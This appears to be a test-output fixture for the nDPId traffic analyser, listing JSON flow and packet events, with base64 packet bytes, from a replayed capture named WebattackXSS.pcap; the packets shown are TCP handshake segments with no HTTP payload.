+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347426122,"flow_last_seen":1499347426122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347426122,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1499347426122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347426122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vtlAAD4GBvesEAABwKgKMt7mAFDtahlHAAAAAKACchDQQgAAAgQFtAQCCAoBOqeeAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3821,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":1499347426122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347426122,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ub5Z5wJ7WoZSKAScSC+twAAAgQFtAQCCAoD5HkUATqnngEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3822,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":1499347426122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347426122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vtpAAD4GBv6sEAABwKgKMt7mAFDtahlI+WecCoAQAOVdvwAAAQEICgE6p54D5HkU"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347427366,"flow_last_seen":1499347427366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347427366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1499347427366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347427366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UGVAAD4GdWusEAABwKgKMt70AFC9kfiwAAAAAKACchAfbQAAAgQFtAQCCAoBOqjVAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":1499347427366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347427366,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3vS8sHHovZH4saAScSBzgwAAAgQFtAQCCAoD5HpLATqo1QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3834,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":1499347427367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347427367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UGZAAD4GdXKsEAABwKgKMt70AFC9kfixvLBx6YAQAOUSiwAAAQEICgE6qNUD5HpL"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347428671,"flow_last_seen":1499347428671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347428671,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1499347428671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347428671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vFFAAD4GCX+sEAABwKgKMt8CAFCqwBZKAAAAAKACchATUQAAAgQFtAQCCAoBOqobAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":1499347428671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347428671,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3wITPWXXqsAWS6AScSAbpgAAAgQFtAQCCAoD5HuRATqqGwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3846,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":1499347428672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347428672,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vFJAAD4GCYasEAABwKgKMt8CAFCqwBZLEz1l2IAQAOW6rQAAAQEICgE6qhsD5HuR"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3862,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347431192,"flow_last_seen":1499347431192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347431192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3862,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1499347431192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347431192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+sNAAD4GywysEAABwKgKMt8cAFA\/1VZRAAAAAKACchA7pAAAAgQFtAQCCAoBOqySAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":1499347431192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347431192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3xwMzQFkP9VWUqAScSCsZgAAAgQFtAQCCAoD5H4HATqskgEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":1499347431193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347431193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+sRAAD4GyxOsEAABwKgKMt8cAFA\/1VZSDM0BZYAQAOVLbgAAAQEICgE6rJID5H4H"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347432482,"flow_last_seen":1499347432482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347432482,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1499347432482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347432482,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rn5AAD4GF1KsEAABwKgKMt8qAFCuFwOqAAAAAKACchAeuQAAAgQFtAQCCAoBOq3UAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":2,"flow_last_seen":1499347432482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347432482,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ypOGaUvrhcDq6AScSCpIAAAAgQFtAQCCAoD5H9KATqt1AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":3,"flow_last_seen":1499347432482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347432482,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rn9AAD4GF1msEAABwKgKMt8qAFCuFwOrThmlMIAQAOVIKAAAAQEICgE6rdQD5H9K"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3889,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347433753,"flow_last_seen":1499347433753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347433753,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3889,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1499347433753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347433753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JW1AAD4GoGOsEAABwKgKMt84AFAetop\/AAAAAKACchAl+QAAAgQFtAQCCAoBOq8SAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3890,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":1499347433753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347433753,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3zgqPCDhHraKgKAScSBXTwAAAgQFtAQCCAoD5ICHATqvEgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":1499347433754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347433754,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JW5AAD4GoGqsEAABwKgKMt84AFAetoqAKjwg4oAQAOX2VgAAAQEICgE6rxID5ICH"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347436274,"flow_last_seen":1499347436274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347436274,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1499347436274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347436274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W69AAD4GaiGsEAABwKgKMt9SAFA\/BeonAAAAAKACchCjcQAAAgQFtAQCCAoBOrGIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":1499347436274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347436274,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ31ICI0S7PwXqKKAScSDWjwAAAgQFtAQCCAoD5IL+ATqxiAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3907,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":3,"flow_last_seen":1499347436274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347436274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W7BAAD4GaiisEAABwKgKMt9SAFA\/BeooAiNEvIAQAOV1lwAAAQEICgE6sYgD5IL+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347437541,"flow_last_seen":1499347437541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347437541,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1499347437541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347437541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80SpAAD4G9KWsEAABwKgKMt9gAFCd2mPvAAAAAKACchDJiQAAAgQFtAQCCAoBOrLFAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":1499347437541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347437541,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ32BqH6Tbndpj8KAScSAzTwAAAgQFtAQCCAoD5IQ6ATqyxQEDAwc="} 